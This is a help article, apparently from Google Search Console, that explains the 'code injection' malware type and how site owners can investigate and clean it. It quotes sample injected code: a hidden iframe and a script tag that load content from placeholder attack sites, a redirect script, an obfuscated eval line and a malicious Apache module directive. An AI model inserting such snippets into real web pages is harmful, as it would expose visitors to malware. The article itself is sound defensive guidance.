Search
Clear search
Close search
Google apps
Main menu

Malware infection type: Code injection

What does it mean to have pages marked with malware infection type "Code injection" in Google Search Console?

This means that pages on your site were modified to include malicious code, such as an iframe to a malware attack site.

For more general information on malware, see Assess the damage (hacked with malware).

How do I investigate the "code injection" malware type?

First, avoid using a browser to view infected pages on your site. Because malware often spreads by exploiting browser vulnerabilities, opening an infected malware page in a browser may damage your computer.

Consider confirming the behavior by using cURL or Wget to perform HTTP requests (for example, to fetch a page). These freely available tools are helpful in diagnosting redirects, and have the flexibility to include referrer or user-agent information. By serving malicious content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and malware scanners. (Your site will need to be online to use these tools.)

For example:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
such as
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Next, log in to your filesystem. Investigate all resources that write to the "code injection" infected URLs. Some examples of malicious code injections the following:

  • iframe to an attack site
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript or another scripting language that calls and runs scripts from an attack site
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • Scripting that redirects the browser to an attack site
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • Malicious code that’s obfuscated to avoid detection
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Shared object files designed to randomly write harmful code to otherwise benign scripts
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Investigate all possible harmful code present on the site. It may be helpful to search for words like [iframe] to find iframe code. Other helpful keywords are "script", "eval", and "unescape." For example, on Unix-based systems:

$grep -irn "iframe" ./ | less

How do I clean my site of the "code injection" malware type?

When ready to clean up your site (Step 7 of the Help for Hacked Site recovery process), you can either replace affected files with the last good backup or you can remove the code injection from each page and all related scripting functions or files. If you modified server configuration files, you may need to restart your webserver for the changes to become effective.

Please be aware that removing the malicious code doesn't address the underlying vulnerability that allowed the hacker to initially compromise your site. Without correcting the root cause, your site may be compromised again in the future. For more information on cleaning your entire site, not just this malware type, see Help for Hacked Sites, specifically "Filesystem damage assessment" in Step 5: Assess the damage (hacked with malware).

Was this article helpful?
How can we improve it?